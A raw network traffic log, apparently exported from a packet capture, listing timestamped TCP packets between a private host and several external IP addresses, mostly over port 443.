Nov 23, 2024 07:09:30.493305922 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.493344069 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.496179104 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.496189117 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.496619940 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.496624947 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.581347942 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.581399918 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.581432104 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.581444025 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.581471920 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.581495047 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.589721918 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.589766979 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.589813948 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.589821100 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.589858055 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.589871883 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.598012924 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.598076105 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.598110914 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.598118067 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.598145962 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.598157883 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.601018906 CET	443	49784	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:30.601099014 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:30.605120897 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:30.605129957 CET	443	49784	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:30.605873108 CET	443	49784	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:30.606379032 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.606422901 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.606462955 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.606470108 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.606508017 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.606515884 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.607132912 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:30.607279062 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:30.607279062 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:30.607285976 CET	443	49784	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:30.613627911 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.613673925 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.613706112 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.613713980 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.613739967 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.613761902 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.621438026 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.621481895 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.621526957 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.621535063 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.621567965 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.621576071 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.629873991 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.629935026 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.629937887 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.629966974 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.629991055 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.630009890 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.642900944 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.642925978 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.642962933 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.642976046 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.643006086 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.643024921 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.651129961 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.651146889 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.651257992 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.651268959 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.651329994 CET	443	49784	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:30.651330948 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.660347939 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.660373926 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.660496950 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.660504103 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.660532951 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.660547018 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.661483049 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:30.661524057 CET	443	49797	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:30.663078070 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:30.668406963 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.668423891 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.668493032 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.668498993 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.668540001 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.670160055 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:30.670172930 CET	443	49797	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:30.677618027 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.677635908 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.677673101 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.677683115 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.677714109 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.677732944 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.686105967 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.686124086 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.686208010 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.686218023 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.686261892 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.695204020 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.695220947 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.695267916 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.695276976 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.695328951 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.704426050 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.704442024 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.704494953 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.704502106 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.704539061 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.760847092 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.760926962 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.760982037 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.760994911 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.761029005 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.761039019 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.771431923 CET	443	49785	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:30.771490097 CET	443	49785	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:30.771547079 CET	49785	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:30.772456884 CET	49785	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:30.772480965 CET	443	49785	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:30.772506952 CET	49785	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:30.772520065 CET	443	49785	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:30.783360004 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.783411026 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.783428907 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.783437014 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.783473015 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.783493996 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.788101912 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.788177967 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.788186073 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.788266897 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.788273096 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.788316965 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.788337946 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.788388968 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.790525913 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.790537119 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.853321075 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.853341103 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.853437901 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.853446960 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.853507042 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.861569881 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.861588001 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.861660004 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.861665964 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.861712933 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.869352102 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.869368076 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.869419098 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.869424105 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.869467020 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.878227949 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.878248930 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.878295898 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.878305912 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.878345013 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.887042999 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.887058973 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.887108088 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.887113094 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.887154102 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.895304918 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.895328045 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.895365953 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.895374060 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.895397902 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.895421028 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.904238939 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.904261112 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.904328108 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.904335976 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.904383898 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.911983013 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.912008047 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.912051916 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.912060022 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.912085056 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.912105083 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.933799982 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.933865070 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.933881044 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.933892965 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.933921099 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.933927059 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.933948040 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.933959961 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.933983088 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.934009075 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.061441898 CET	80	49778	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:31.061512947 CET	49778	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:31.063836098 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.063857079 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.063981056 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.063981056 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.063992977 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.064023972 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.071971893 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.071989059 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.072066069 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.072077990 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.072114944 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.079643011 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.079659939 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.079771996 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.079780102 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.079819918 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.088480949 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.088501930 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.088531971 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.088537931 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.088584900 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.097189903 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.097206116 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.097296953 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.097311020 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.097357988 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.105525017 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.105541945 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.105619907 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.105627060 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.105644941 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.105675936 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.114180088 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.114196062 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.114268064 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.114273071 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.114362001 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.121848106 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.121864080 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.121967077 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.121978998 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.122056007 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.124695063 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.124758005 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.124773979 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.124789000 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.124818087 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.124835014 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.157843113 CET	443	49784	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:31.158029079 CET	443	49784	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:31.158126116 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:31.158446074 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:31.158463001 CET	443	49784	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:31.158473015 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:31.170511007 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.170538902 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.170574903 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.170588017 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.170613050 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.170627117 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.274302959 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.274333000 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.274370909 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.274384975 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.274410963 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.274434090 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.281709909 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.281725883 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.281769037 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.281775951 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.281807899 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.281807899 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.290411949 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.290432930 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.290455103 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.290462017 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.290503025 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.290503025 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.291899920 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.291925907 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.291965961 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.291979074 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.292002916 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.292011023 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.299150944 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.299168110 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.299204111 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.299210072 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.299232960 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.299252987 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.307966948 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.307984114 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.308060884 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.308060884 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.308068037 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.308129072 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.316095114 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.316112995 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.316168070 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.316173077 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.316190004 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.316229105 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.317475080 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.317518950 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.317533970 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.317545891 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.317557096 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.317579031 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.323761940 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.323790073 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.323847055 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.323853970 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.323872089 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.323951960 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.329298019 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:31.329395056 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:31.332555056 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.332570076 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.332616091 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.332622051 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.332631111 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.335069895 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.342593908 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.342639923 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.342683077 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.342695951 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.342729092 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.342740059 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.363244057 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.363293886 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.363331079 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.363346100 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.363378048 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.363461018 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.440807104 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:31.440817118 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:31.450170994 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.450277090 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.460305929 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:31.460316896 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:31.461729050 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.461738110 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.477034092 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.477099895 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.477209091 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.477268934 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.484813929 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.484836102 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.484911919 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.484921932 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.484965086 CET	49775	443	192.168.2.6	150.171.27.10
